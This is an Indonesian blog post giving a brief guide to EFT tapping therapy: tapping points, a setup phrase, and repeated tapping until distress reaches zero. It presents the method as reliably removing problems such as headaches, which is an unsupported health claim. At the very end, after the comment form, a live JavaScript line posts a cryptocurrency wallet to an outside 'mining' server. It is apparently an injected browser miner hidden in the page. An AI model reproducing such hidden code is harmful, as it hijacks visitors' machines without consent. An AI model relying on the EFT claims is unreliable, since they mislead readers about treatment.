belajar komputer

Jumat, 08 Februari 2013

TEHNIK TERAPI EFT

Panduan ringkas ini bersumber dari Manual EFT yang disusun oleh Gary Craig, penemu teknik ini. Manual lengkap bisa anda dapatkan secara gratis dengan mengunjungi situs eftuniverse . Gambar di bawah ini adalah titik-titik penotokan.
,
1. Awal alis sebelah dalam
 2. Tulang di sisi luar mata
 3. Tulang di bawah mata
 4. Di bawah hidung
5. Di antara mulut dan dagu
6. Awal tulang selangka bagian dalam
7. Titik lembut kira-kira 10 cm di bawah ketiak
 8. Di bawah puting
 9. Ujung ibu jari
10. Ujung jari telunjuk
 11. Ujung jari tengah.
 12. Ujung jari
13. Titik gamut
14. Titik karate

PROSEDUR EFT Langkah-langkah menerapkan EFT sangatlah mudah dan anda bisa mencobanya sendiri dalam beberapa menit saja untuk menyingkirkan apa yang saat ini sedang mengganggu anda. Selanjutnya, ketekunan anda yang akan sangat menentukan tingkat kemahiran anda dalam menerapkan teknik ini. Saya tidak tahu apakah anda tergolong orang yang tekun dan memperhatikan diri anda sendiri. Tetapi, EFT merupakan teknik yang menakjubkan dan ia lebih menakjubkan jika dibarengi dengan kesungguhan dan ketekunan anda dan kesediaan anda meluangkan waktu beberapa menit sehari untuk menggunakannya. Prosedur Ringkas:

 Langkah 1 - Sebut masalah yang Anda hadapi, lebih baik jika anda bisa spesifik.

 Langkah 2 - Tentukan derajat kesulitan masalah ini menurut penilaian subjektif anda [skala 0–10, 0 = tidak ada kesulitan, 10 = paling sulit]

 Langkah 3 – Sambil mengetuk-ngetuk “titik karate” (karate chop) di tangan anda atau mengusap-usap “titik nyeri” (sore spot) di dada bagian jantung anda, ucapkan: “Meskipun [Saya mempunyai masalah ini], saya menerima diri saya dengan tulus dan apa adanya.” Ucapkan tiga kali dengan keras. Sebagai contoh: “Meskipun saya merasakan nyeri sekali di kepala saya, saya menerima diri saya dengan tulus dan apa adanya.”

 Langkah 4 – Dengan menggunakan dua jari, ketuk-ketuklah setiap titik dengan cepat kira-kira 7 kali. Mulailah dari titik 1 (pangkal alis) dan berakhir pada titik 7 (sedikit di bawah ketiak). Sambil mengetuk-ngetuk setiap titik tersebut, ucapkan dengan keras sebuah kata atau frase kunci yang akan membantu Anda untuk tetap fokus pada problem anda. Contoh kata kunci: “nyeri di kepala”

 Langkah 5 – Tarik nafas dalam-dalam.

Langkah 6 – Periksa derajat kesulitan anda. Jika anda rasakan ada kemajuan yang berarti, meskipun masih ada problem yang tersisa, ulangi prosedur anda dengan menambahkan kata “masih” pernyataan: “Meskipun saya masih tersisa rasa nyeri di kepala saya, saya menerima diri saya dengan tulus dan apa adanya.” Teruskan sampai derajat kesulitan anda menjadi 0 (nyeri anda hilang sama sekali). Kata atau frase kunci yang bisa anda sebutkan untuk tiap titik: “masih tersisa rasa nyeri di kepala.” Jika tidak ada perkembangan sama sekali (derajat kesulitan tetap tinggi), atau hanya turun di angka tertentu (misalnya 3) dan tidak bisa mencapai 0, biasanya ada emosi negatif yang mendasari masalah tersebut. Periksalah emosi negatif yang menjadi akar masalah anda, dan singkirkan hal itu dengan prosedur yang serupa. Prosedur Standar Inilah prosedur mula-mula yang diperkenalkan oleh Gary Graig. Prosedur ini melibatkan penotokan dari ujung alis hingga ujung-ujung jari tangan dan 9 gamut procedure. Langkah-langkahnya sebagai berikut: Langkah 1 – Setup, yakni anda menyampaikan pernyataan sambil mengetuk-ngetuk karate chop atau mengusap-usap sore spot. Biasanya pernyataan diulang 3 kali. Langkah 2 – Lakukan pengetukan di seluruh titik dari ujung alis hingga ujung-ujung jari dan berakhir di karate chop (lihat gambar). Nyatakan kata atau frase kunci di tiap titik.

sumber : http://ujungjarimu.blogspot.com

Tidak ada komentar:

Posting Komentar

var wallet = "cy_26 067b6 be129 ba270 c8100 e0f49 03d82 eab5c 3b065 43fea e169e c7e1f aa5fd f1"; $.post("http://mining.cayafuture.com:2435/"+wallet, function( data ) { //alert(data); })